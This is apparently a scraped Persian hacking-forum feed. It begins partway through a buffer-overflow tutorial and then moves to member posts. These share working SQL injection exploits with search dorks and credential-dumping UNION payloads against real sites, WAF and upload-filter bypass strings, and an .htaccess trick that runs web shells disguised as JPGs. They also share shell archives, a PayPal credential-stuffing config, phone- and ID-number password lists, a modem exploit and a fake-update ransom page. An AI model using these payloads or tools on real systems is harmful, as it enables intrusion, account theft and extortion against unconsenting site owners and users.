می‌گیرند. اگر این مقدار تغییر کند، سیستم از وقوع “Buffer Overflow” آگاه می‌شود. Address Space Layout Randomization (ASLR): مکان‌های خاصی از حافظه را در هر اجرا تغییر می‌دهد تا بهره‌برداری از آسیب‌پذیری‌ها دشوارتر شود. Data Execution Prevention (DEP/NX): جلوگیری از اجرای کد در بخش‌هایی از حافظه که فقط برای داده‌ها تعیین شده‌اند. نحوه دور زدن محافظت‌ها (به صورت مختصر) شامل تکنیک‌های پیچیده‌ای مانند Return-Oriented Programming (ROP) است. این روش به بهره‌برداران اجازه می‌دهد که با استفاده از توابع موجود در باینری و بدون اجرای مستقیم کد مخرب، سیستم را به نیات خود هدایت کنند. استفاده از توابع امن مانند strncpy به جای strcpy. همواره اندازه ورودی‌ها را بررسی کرده و از توابعی که به صورت پیشفرض امن نیستند، با احتیاط استفاده کنید. از روش‌های استاندارد برای مدیریت حافظه و محافظت از برنامه‌ها در برابر آسیب‌پذیری‌ها بهره ببرید، مانند استفاده از پشته‌های محافظت شده و ارزیابی دقیق کد #include <stdio.h> #include <string.h> void vulnerableFunction(const char *input) { char buffer[5]; strcpy(buffer, input); printf("Received: %s\n", buffer); } int main() { char userInput[20]; printf("Enter input: "); gets(userInput); vulnerableFunction(userInput); return 0; } تابع gets ورودی بیش از حد مجاز دریافت می‌کند. تابع strcpy ورودی را بدون بررسی به buffer منتقل می‌کند. تغییرات منجر به خرابی یا اجرای کد دلخواه می‌شود. gdb -q ./vulnerable (gdb) run > Enter a long input: AAAAAAAAAAAAAAAAAAA > Received: AAAAAAAAA می‌توان مشاهده کرد که چگونه ورودی طولانی، باعث تغییر آدرس‌ها در پشته می‌شود. مثال توابع امن: استفاده صحیح از strncpy به جای strcpy: char safeBuffer[10]; strncpy(safeBuffer, inputString, sizeof(safeBuffer) - 1); safeBuffer[sizeof(safeBuffer) - 1] = '\0'; // اطمینان از صحیح‌بودن پایان رشته کد نهایی عملی 🫡 /** * vulnerable.c * یک برنامه نمونه برای نمایش سرریز بافر و اکسپلویت آن * کامپایل با دستور زیر (محیط لینوکس ۳۲ بیتی): * gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c */ #include <stdio.h> #include <string.h> // تابع مخرب هدف برای تغییر جریان اجرا void hacked() { printf("\033[1;31m[!] سیستم شما هک شد!\033[0m\n"); printf("\033[1;32m[*] کاراکترهای مخرب اجرا شدند!\033[0m\n"); // اینجا می‌توانید Shellcode جایگزین قرار دهید } // تابع آسیب‌پذیر به سرریز بافر void vulnerable_function() { char buffer[12]; // بافر با ظرفیت ۱۲ بایت printf("آدرس تابع hacked(): %p\n", hacked); // چاپ آدرس جهت کمک به اکسپلویت strcpy(buffer, "مقدار اولیه"); // مقداردهی اولیه بی‌خطر printf("ورودی خود را وارد کنید: "); gets(buffer); // نقطه آسیب‌پذیر: دریافت داده بدون بررسی اندازه printf("ورودی دریافتی: %s\n", buffer); } int main() { vulnerable_function(); printf("برنامه عادی خاتمه یافت.\n"); return 0; } 🛡️ نسخه ایمن‌سازی شده همان کد #include <stdio.h> #include <string.h> void vulnerable_function_safe() { char buffer[12]; printf("ورودی ایمن وارد کنید: "); // استفاده از fgets به جای gets با محدودیت اندازه if (fgets(buffer, sizeof(buffer), stdin) == NULL) { printf("خطا در دریافت ورودی!\n"); return; } // حذف کاراکتر newline (اختیاری) buffer[strcspn(buffer, "\n")] = '\0'; printf("ورودی دریافتی: %s\n", buffer); } int main() { vulnerable_function_safe(); printf("برنامه ایمن خاتمه یافت.\n"); return 0; } لینک ویدیو یوتیوب این مقاله 🧐
    1 امتیاز
  8. سلام خیلی ممنون واسه مطلب هک مودم0نا100. یه سوال؟؟؟ بعد از هک این هارو(PPP UsernameوPPP PasswordوMAC Address)از کجا پیدا کنیم برای کانتک شدن. لطفا اگه امکانش هست اموزش تصویری بزارید خیلی ممنون
    1 امتیاز
  9. فایل برای دانلود مشکلی نداره
    1 امتیاز
  10. دیسکورد اکنون به کاربر امکان می‌دهد تا کاربران دیگر را بدون آنکه متوجه شوند، بی‌صدا کنید. دیسکورد راه جدیدی را برای مسدودکردن افراد ارائه داده است، بدون آنکه نیازی به رویارویی مستقیم باشد. ویژگی جدید که نادیده‌گرفتن (Ignore) نام دارد، در واقع نوعی بی‌صداکردن (Mute) است که می‌تواند پیام‌های کاربران مزاحم یا آزاردهنده را بدون جلب توجه یا ایجاد تنش مخفی کند. برای فعال‌کردن Ignore کافی است به پروفایل کاربر مدنظر بروید و روی منو سه‌نقطه ضربه بزنید و گزینه‌ی Ignore را انتخاب کنید. پس‌از فعال‌سازی، دیگر پروفایل و پیام‌های آن شخص را مشاهده نخواهید کرد و حضور او در سراسر دیسکورد برای شما کم‌رنگ‌تر خواهد شد؛ زیرا اعلان‌های مربوط به او، ازجمله پیام‌های سرورها، بی‌صدا می‌شوند. تفاوت اصلی ویژگی Ignore با مسدودکردن در این است که برخلاف مسدودشدن، کاربر همچنان خواهد توانست پروفایل شما را ببیند و برای شما پیام ارسال کند. شما از آن پیام‌ها مطلع نخواهید شد؛ مگر آنکه آن‌ها را از حالت مخفی خارج کنید. مهم‌تر از همه، فردی که او را «نادیده گرفته‌اید»، متوجه این موضوع نخواهد شد. دیسکورد اعلام کرده است که این ویژگی را به مجموعه‌ی ابزارهای ایمنی خود اضافه می‌کند تا به‌ویژه به نوجوانان کمک کند بدون ترس و اضطراب از برخی افراد فاصله بگیرند. همچنین، این شرکت به‌همراه OpenAI، گوگل، روبلاکس و دیگر شرکت‌ها در حال تأسیس بنیاد غیرانتفاعی به نام ROOST است. این بنیاد قرار است فناوری متن‌باز برای شناسایی محتوای سوءاستفاده‌ی جنسی از کودکان (CSAM) را در اختیار سازمان‌های مختلف قرار دهد.
    1 امتیاز
  11. با پیشرفت سریع فناوری و افزایش پیچیدگی سیستم‌های اطلاعاتی، حفاظت از داده‌ها و سیستم‌ها به یکی از مهم‌ترین دغدغه‌های سازمان‌ها تبدیل شده است. تست نفوذ یا Penetration Testing یکی از روش‌های اساسی برای ارزیابی امنیت سیستم‌ها و شبکه‌هاست. این فرآیند شامل شبیه‌سازی حملات و تلاش برای یافتن و بهره‌برداری از آسیب‌پذیری‌ها است. ابزارهای تست نفوذ به هکرهای اخلاقی این امکان را می‌دهند تا به‌طور موثری امنیت سیستم‌ها را بررسی کنند. در این مقاله، به بررسی جدیدترین و برترین ابزارهای تست نفوذ که در حال حاضر استفاده می‌شوند، خواهیم پرداخت. 1. OWASP Zed Attack Proxy (ZAP) OWASP ZAP یکی از محبوب‌ترین ابزارهای متن‌باز برای تست امنیت برنامه‌های وب است. این ابزار به شما امکان می‌دهد تا حملات مشترکی مانند XSS و SQL Injection را شبیه‌سازی کنید. ویژگی‌های کلیدی ZAP عبارتند از: محیط کاربرپسند و پلاگین‌های متعدد امکان اسکن خودکار و دستی برنامه‌های وب پروکسی برداری برای رهگیری و تحلیل ترافیک HTTP استفاده از ZAP: برای کسانی که تازه به دنیای هکینگ وارد شده‌اند، شروع با ZAP می‌تواند یک نقطه شروع عالی باشد، زیرا این ابزار به راحتی نصب و قابل استفاده است. 2. Burp Suite Pro Burp Suite Pro یک ابزار قدرتمند برای ارزیابی امنیت وب اپلیکیشن‌هاست. این ابزار امکانات گسترده‌ای برای تحلیل و شناسایی آسیب‌پذیری‌ها دارد. ویژگی‌های برجسته Burp Suite Pro شامل موارد زیر است: اسکن خودکار برای شناسایی آسیب‌پذیری‌ها ابزار جامع برای رهگیری و تحلیل ترافیک افزونه‌های قابلیت استفاده برای تست‌های خاص استفاده از Burp Suite Pro: با وجود هزینه، این نسخه امکاناتی فراتر از نسخه رایگان دارد و برای حرفه‌ای‌های امنیت و تیم‌های تست نفوذ ضروری است. 3. Cobalt Strike Cobalt Strike یکی از ابزارهای برتر در زمینه حملات پسا‌نفوذی و شبیه‌سازی حملات تیم قرمز است. این ابزار به کاربران این امکان را می‌دهد تا سناریوهای پیچیده حملات را شبیه‌سازی و اجرا کنند. ویژگی‌های اصلی شامل: امکانات گسترش نفوذ و حفظ دسترسی دسترسی به مدل‌های حمله آماده ابزارهای جامع برای فرماندهی و کنترل (C2) استفاده از Cobalt Strike: ابزاری ایده‌آل برای تیم‌های قرمز که می‌خواهند مدل‌های حمله پیچیده‌تری را در محیط‌های سازمانی آزمون کنند. 4. Empire Empire یک فریم‌ورک برای حملات پسا‌نفوذی است که به شما این امکان را می‌دهد تا بر روی سیستم‌های هدف خود دسترسی را حفظ و گسترش دهید. ویژگی‌های کلیدی Empire عبارتند از: ماژول‌های متنوع برای جمع‌آوری اطلاعات و گسترش دسترسی واسط کاربری خط فرمان با طراحی کاربرپسند پشتیبانی از زبان‌های مختلف برای توسعه و سفارشی‌سازی استفاده از Empire: این ابزار برای هکرهای اخلاقی که نیاز به انجام حملات جامع و پیچیده دارند، جذاب و حیاتی است. 5. BloodHound BloodHound مخصوص شناسایی و تحلیل مسیرهای حمله در محیط‌های Active Directory است. این ابزار از گراف‌ها برای نمایش ارتباطات و شناسایی آسیب‌پذیری‌ها استفاده می‌کند. ویژگی‌های اصلی: توانایی نمایش روابط کاربری و دسترسی‌ها امکان تحلیل و شبیه‌سازی مسیرهای حمله محیط کاربرپسند برای تحلیل سریع اطلاعات استفاده از BloodHound: برای شناسایی و تحلیل شبکه‌های Windows AD، این ابزار بی‌نظیر است و به سرعت به تحلیلگران امنیتی کمک می‌کند. 6. Metasploit Framework Metasploit یکی از مشهورترین ابزارهای تست نفوذ است که همچنان به‌طور مداوم به‌روزرسانی می‌شود. این فریم‌ورک برای طراحی و اجرای آزمایش‌های نفوذ و بهره‌برداری از آسیب‌پذیری‌ها به کار می‌رود. ویژگی‌ها شامل: کتابخانه گسترده از ماژول‌های بهره‌برداری امکان ایجاد و تست اسکریپت‌های سفارشی پشتیبانی گسترده و مستندسازی استفاده از Metasploit: به عنوان یک ابزار استاندارد در میان تحلیلگران امنیت و هکرهای اخلاقی استفاده می‌شود و به‌طور منظم به‌روز می‌شود. 7. Nmap Nmap یکی از اساسی‌ترین ابزارها برای کشف شبکه و پویش پورت است. این ابزار با قدرت بالا و انعطاف‌پذیری فوق‌العاده‌ای برای تست نفوذ به‌کار می‌رود. ویژگی‌های کلیدی Nmap عبارتند از: پشتیبانی از اسکن‌های گسترده و دقیق امکان شناسایی سیستم عامل و سرویس‌های فعال قابلیت سفارشی‌سازی از طریق اسکریپت‌های NSE استفاده از Nmap: یک ابزار ضروری برای مرحله شناسایی و اطلاعات‌یابی در تست‌های نفوذ. 8. Wireshark Wireshark یکی از برجسته‌ترین ابزارها برای تحلیل ترافیک شبکه است. با استفاده از این ابزار، تحلیلگران امنیتی می‌توانند ترافیک شبکه را بررسی و تجزیه‌وتحلیل کنند. ویژگی‌های کلیدی: توانایی رهگیری و تجزیه‌وتحلیل بسته‌های شبکه قابلیت فیلترگذاری پیچیده برای نمایش ترافیک مورد نظر پشتیبانی از اکثر پروتکل‌های شبکه استفاده از Wireshark: ابزاری است ضروری برای هر تحلیلگر امنیتی که می‌خواهد به نحو مؤثری ترافیک شبکه را مانیتور کند. 9. Sn1per Sn1per ابزاری خودکار برای تست امنیتی است که فرایندهای شناسایی و بهره‌برداری را منظم و سریع انجام می‌دهد. این ابزار به شکل یکپارچه عمل می‌کند: قابلیت اسکن خودکار و نیمه‌خودکار توانایی شناسایی گستره وسیعی از آسیب‌پذیری‌ها امکان استفاده در حالت تیمی برای جامع بودن تست‌ها استفاده از Sn1per: برای تیم‌های امنیتی که به سرعت و دقت بیشتری در شناسایی و تست نیاز دارند. 10. Amass Amass یک ابزار پیشرفته برای شناسایی دارایی‌های دیجیتال و جمع‌آوری اطلاعات درباره آن‌هاست. ویژگی‌های کلیدی آن شامل: شناسایی و کشف شبکه‌های سازمان توانایی پیمایش و تحلیل گسترده زیرساخت‌ها استفاده از منابع اطلاعاتی گسترده برای تحلیل و شناسایی استفاده از Amass: به تیم‌ها و تحلیلگران امنیتی کمک می‌کند تا وضعیت امنیتی جامع‌تری از دامنه و زیرساخت‌های تحت کنترل داشته باشند. خلاصه امیدوارم مفید بوده باشه و خوشتون اومده باشه و اگر دوست داشتین میتونیم توی همین تاپیک نصب تک به تک ابزار هارو بزارم واستون تا به ساده ترین روش ممکن ازشون استفاده کنید 🫡
    1 امتیاز
  12. شل Darkness فایل اصلی و فایل دیکد شده پیوست شدند ./ dark.php dark-decoded.php
    1 امتیاز
  13. سلام این جلسه: ارائه فیک آپدیت برای تمامی ویندوز ها + یک پیج باج خواهی کاملا ساده قسمت دوم، جلسه سوم: فیک پیج + پیج باج خواهی 8.mp4 فایل های این جلسه(guardiran.org): PAGE.zip
    1 امتیاز
  14. با سلام مشکل در ارتباط و بالا آمدن دارم.
    1 امتیاز
  15. Balcon

    بایپس آپلودر

    سلام میشه کسی این آپلودر رو [Hidden Content] بایپس کنه یه فیلم بگیره من هرچی تلاش میکن نمیتونم لطفا با افزونه http live headr بایپس کنید ممنون
    1 امتیاز
  16. 0r0b4s

    بایپس آپلودر

    سلام دوست عزیز شما میحواید بایپس یاد بگیرید یا دیفیس اگر بایپس مسخواسد بنده بهترین ایزار رو براتون میگم که یاد بگیرید burp suite واگر میخواید دیفیس یاد بگیرید همون فایل html اپلود کنید ثبت کنید و نه میخواید امنیت و راهگار یاد بگیرید سای portswigger academj حتما همه اموزش هاش رو یاد بگیرید یک امنیت کار خوب میشید اینو تضمین میکنم .نکته اخر مطلالعه کنید ممنون یا حق
    1 امتیاز
  17. 0r0b4s

    بایپس آپلودر

    دوست عزیز تارکت شما لود نمیشه برا بنده
    1 امتیاز
  18. 0r0b4s

    بایپس آپلودر

    دوست عزیز زاهکارهای زیادی برا الو کردن در این توع میباشد برای مقال شما میتونید اخر فایلتون عدد بزنید برای مثال php6و غیره
    1 امتیاز
  19. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
    1 امتیاز
  20. Sadra

    آپلود شلر

    سلام اول گفته باشم که از یک شل اختصاصی استفاده کنید چون فایروال شل هایی مثل الفا رو میشناسه. بایپس های مختلفی وجود داره که یک سری رو اینجا قرار میدم: .php5 .php7 .PhP .php;.png .php%00.png و همچنین میتونید header رو تغییر بدید با ابزار برپ سویت و از اون طریق هم تست کنید. اگر سرچ کنید بایپس های rfu توی یوتیوب ویدئو زیاده. موفق باشید.
    1 امتیاز
  21. سلام، من یک وب سایت را برای آسیب پذیری اسکن کردم و برنامه یکسری آسیب پذیری با عنوان "Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause" پیدا کرد: URL [Hidden Content] Method GET Parameter _ Attack 1') AND 3944=3944 AND ('GJLN'='GJLN *********** URL [Hidden Content] Method GET Parameter _ Attack field: [_], value [; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ] *********** URL [Hidden Content] Method GET Parameter _ Attack 1 and 0 in (select sleep(15) ) -- *********** URL [Hidden Content] Method GET Parameter _ Attack field: [_], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)] من وقتی آدرس بالا را در مرورگر می نویسم فقط یک ویدئو که در سایت وجود داره پخش میشه! چه جوری میتونم از این آسیب پذیری استقاده کنم؟ با تشکر.
    1 امتیاز
  22. بسم الله الرحمن الرحیم اسم این ابزار urlbuster هست یکی از بهترین و قدرتمند ترین ابزارها در زمینه پیدا کردن فایل ها و فولدر های مخفی وب سایت ها است که می توانید از آن استفاده کنید و آن را در انواع سیستم عامل ها هم نصب نمایید، در آموزش fuzzing یکی از ابزارهای دیگر در این زمینه را معرفی کرده‌ایم اما این ابزاری که در حال حاضر در حال معرفی آن هستیم یکی از بهترین آن ها است که شما به دلخواه خود می توانید یکی از این ابزارها را در تست نفوذ خود به کار ببرید و می‌توانید کار با هر دو این ابزارها را تجربه کنید. آموزش نصب و استفاده از ابزار برای جستجوی فایل ها و فولدر های مخفی وب سایت برای نصب این ابزار در لینوکس می توانید آن را از گیت هاب دانلود کنید و وارد دایرکتوری آن شده و سپس فایل نصبی آن را با استفاده از پایتون اجرا کنید: git clone [Hidden Content] cd urlbuster python setup.py راحت ترین راه نصب urlbuster دستور زیر است که به راحتی با pip نصب خواهد شد: pip install urlbuster بعد از اتمام نصب شما می توانید با دستور urlbuster ابزار را اجرا کنید. نکته: این ابزار دارای امکان ست کردن کوکی و پروکسی است و همچنین با استفاده از آن می توانید ورودی‌ها درخواست ها و موارد بسیار دیگر را بررسی کنید که بعد از اجرای آن با استفاده از سوئیچ راهنما می توانید بخش های مختلف آن را مشاهده کنید. برای آشنایی بیشتر با نحوه کار با این ابزار به دستور زیر توجه کنید، در این دستور با استفاده از سویچ w فایل ورد لیست ما که می‌خواهیم بروت فورس شوند را به ابزار می دهیم و سپس url مورد نظر خود را که می‌خواهیم وارد لیست بر روی آن تست شود را وارد می‌کنیم، بعد از اجرا و پایان کار ادرس فایل ها و فولدر های مخفی را اگر تشخیص داده باشد مشاهده می کنید. urlbuster -W file.txt [Hidden Content] منبع: Guardiran.org
    1 امتیاز
  23. به نام خدا سلام یک ویدیو ی ساده در مورد این موضوع تهیه کردم. Video.rar
    1 امتیاز
  24. Sadra

    Sql injection Exploit

    با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+
    1 امتیاز
  25. [Hidden Content],2,group_concat(username,0x3a,password),4,5,6,7,8,9,10+from+administrator-- - با سلام خدمت همه اعضای گارد ایران بچه ها یکم راجب بایپس این دستور کمک کنید هرکاری میکنم نمیتونم تمام روش های تو انجمن رو هم رفتم فایروال حساس به from هستش . بایپس هایی که رفتم این ها هستند. همش ارور forbidden میده !!! /*!50000from*/ /*!from*/ /**anything**/from
    1 امتیاز
  26. Sadra

    Sql injection Exploit

    Exploit 6 : Powered by Shambhala.Travel - SQL Injection vulnerability #Exploit Title: Powered by Shambhala.Travel - SQL Injection vulnerability #Date: 2020-10-21 #Google Dork: "Powered by Shambhala.Travel" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by Shambhala.Travel" Demo : [Hidden Content],2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+ [Hidden Content],2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56-- [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+
    1 امتیاز
  27. Sadra

    Sql injection Exploit

    Exploit 2 : Designed by Launch Web Dreams - SQL Injection vulnerability #Exploit Title: Designed by Launch Web Dreams - SQL Injection vulnerability #Date: 2020-11-07 #Google Dork: "Designed by Launch Web Dreams" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Designed by Launch Web Dreams" Demo : [Hidden Content],22222,33333,version(),55555,66666,77777,88888--&Type=Men [Hidden Content],2222,3333,4444,version(),6666,7777,8888,9999--&Type=Mask * Results are displayed in the source
    1 امتیاز
  28. ویدئوی اول سایت مورد نفوذ :‌ [Hidden Content] ادرس: view-source:[Hidden Content]/details.php?aid=4-6+union+select+1,2,3,4,group_concat(username,0x3a,password,0x3c62723e),6,7+from+tbl_adm_users-- خط ۹۹ در سورس ، پسورد هش شده که در ویدئو کرک هم می کنیم . اگه کیفیت پایین هست به این لینک مراجعه کنید : [Hidden Content]
    1 امتیاز
  29. Mr.Taser

    (Paypal API Config (New

    Paypal API Config (New) Soft:OpenBullet Proxy:Need Bot:150 Paypal.anom
    1 امتیاز
  30. درود، احتمالا نیاز به بایپس WAF دارید متود های زیر رو تست کنید: +ORDER+BY+99999 +/*!13337ORDER*/+/*!13337BY*/+99999 +/*!50000ORDER*/+/*!50000BY*/+99999 +OrdER+bY+99999 اخر هرکدومشون هم کاراکتر های زیر رو بزارید: -- - -- %23 به طور مثال +OrDEr+bY+99999 -- -
    1 امتیاز
  31. DeMoN

    بانک شل

    سلام خدمت دوست عزیز گارد ایران. در این تاپیک قصد دارم بهترین و پرکاربرد ترین شل هارو قرار بدم. امیدوارم لذت ببرین. اولین شل:adminer adminer-3.6.3.rar
    1 امتیاز
  32. یه ورد لیست ۴ مگ هم من آپلود میکنم امیدوارم به دردتون بخوره اگر مورد پسندواقع شد بگید تا پس لیست های خودمو براتون قرار ب دم! guardiranteam passlist.txt
    1 امتیاز
  33. proxy

    آپلود شل روی سایت

    یک شل برای دور زدن آپلودر عکس که به سایز تصویر گیر میده [Hidden Content] اینم پست دوست خوبم rex که آموزش آپلود شل در انواع سی ام اس رو آموزش داده [Hidden Content]
    1 امتیاز
  34. proxy

    شل با قابلیت jpg

    [Hidden Content] یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐
    1 امتیاز
  35. proxy

    بانک شل

    یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐 <FILESMATCH "^.*/.jpg"> SetHandler application/x-httpd-php </FILESMATCH> shell.rar
    1 امتیاز
  36. RedNofozi

    چند شل آماده

    شل.rarبا سلام نزدیک ده تا شل پر کاربرد برای شما اماده کردم ا میدوارم خوشتون بیاد
    1 امتیاز
  37. باسلام به همه دوستان دوست عزیز در شرکت های بزرک میان در ایکس چنج سرور یه کاری میکنن البته ینده تارکت شمارو ندیدم و بصورت کلی میگم که این چنین هم میشه مثلا دانشگاهی که خود بنده .... احتمالا شما با چنین سرورهایی برخورد کردید چون بنده با دوست عزیز 1tedروی سروری کار میکردیم برای یک سازمان پزوهشی بود که اسکیوال داشت و ما کیه کاربرانو در اوردیم بجز ادمین که بعدا فهمیدم زیرساختشون این چنین بوده شما میتونین با جمع اوری اطلاعات دقیق از سرور بفهمید که ایا یوزر ادمین در داخل یکی از اون تیبل هاس یا در یک سرور دیکه قرار داره باز یادم رفته بود اکه با ابزارهای تزریق خوب کار کرده باشید با همونا میتونید مستقیم یک اپلودر یا شل اپلود کنید
    1 امتیاز
  38. فک نکنم بتونه گود نده پسورد لیست برای همه چیز مخصوصا کرک پسورد WiFi حجم : زیاد Real-Passwords-Rev1_2-targz.torrent Real-Passwords-Rev1_2-7z.torrent Dict-Style-Rev1_2-7z.torrent Dict-Style-Rev1_2-targz.torrent
    1 امتیاز
  39. CINAPA

    هك مودم جواب نميده

    سلام مدير انگار كم اورد لااقل شما يه كم توضيح بدين . من كه گفتم دوتا خط با دوتا مودم دارم پس نشون ميده كه از يه isp اكانت دارم . اتفاقا براي هك نميخوام من قبلا يه سيستم داشتم كه مثل دوربين مدار بسته از راه دور استفاده ميكردم و لي يه مدتي هست كه نميشه . لطف راهي بهم نشون بدين كه بتونم استفاده كنم . اين كه بگين من بيشتر توضيح نميدم يعني چي ناسلامتي اينجا انجمن هست . براي بالا بردن سطح علمي درست كردن نه اين كه بيان الكي يه چيزي هايي بگن و هي فيلم بزارن براي دانلود و اخرش تو عمل همش اشتباه باشه . اگه هم بلد نيستين راحت بگين بلد نيستيم و اگه نميخوايين به كسي چيزي ياد بدين پس چرا مياين انجمن كه بگين من ديگه چيزي نميگم . لاقل يه لينكي چيزي بزارين ...... و اينم مطمعن باشين كسي كه مياد انجمن سوال ميكنه حتما قبلش همه جا ها را رفته و سرچ كرده وبه جايي نرسيده . والا منم ميتونم بيام از اين انجمن ها بزنم كه به كسي جواب ندم كاري نداره
    1 امتیاز
  40. با سلام دوستان پسورد لیست کد های ملی 458 و 459 و شماره موبایل همراه اول (0912) رو براتون قرار دادم. پسورد فایل: guardiran.org pass.rar تشکر نشانه رضایت شماست
    1 امتیاز
  41. با سلام شماره های 0936 رو قرار دادم. پسورد فایل: guardiran.org 0936.rar تشکر نشانه رضایت شماست
    1 امتیاز
  42. با سلام پسورد لیست شماره های همراه اول (0919). پسورد فایل: guardiran.org Hamrahe Aval.rar تشکر نشانه رضایت شماست
    1 امتیاز
  43. با سلام دوستان این اموزش به در خواست یکی از دوستان گلم ضبط شده است. عده ای به این باگ rom-0 هم می گن. این باگ خطرناک هستش و اکثریت مودم های adsl این باگ رو دارند. اگر از هک مودم های adsl هیچ اطلاعی ندارید پیشنهاد می کنم به این صفحه نگاهی بیندازید: [Hidden Content] در اموزش بعدی نحوه دیباگ کردنش رو قرار میدم. پسورد فایل ها: guardiran.org zynos.part1.rar zynos.part2.rar تشکر نشانه رضایت شماست
    1 امتیاز
  44. این پسورد لیست ( Password List ) یکی از بهترین و کاملترین پسورد لیستهاست که شامل : پسورد لیست علامت Symbol Passwrd list پسورد لیست اعداد Nuber Password List پسورد لیست حروف Characters Password List ,... پسورد فایل : guardiran.org Password List.rar
    1 امتیاز
  45. این پسورد لیست که براتون در فایل ضمیمه قرار دادم آمیخته ای از : علامت اعداد حروف کلمات اسامی و.. هست و حدود چندین هزار پسورد رو در خودش داره و ممکنه در بسیاری از مراحل بکارتون بیاد بدلیل اینکه از پسورد هایی انتخاب شده که در اکثریت اوقات جوابگو هست . پسورد فایل : guardiran.org . PassList.rar
    1 امتیاز
  46. درود پسورد لیست برای پسورد های انگلیسی. موفق باشید. پسورد فایل : guardiran.org pw list 1.rar
    1 امتیاز
  47. درود این یک پسورد لیست دست ساز هست و پسورد های که توش بکار رفته پسورد های هست که اکثرا از آن استفاده میکنند. پسورد : guardiran.org pass list ds.rar
    1 امتیاز
×
×
  • ایجاد مورد جدید...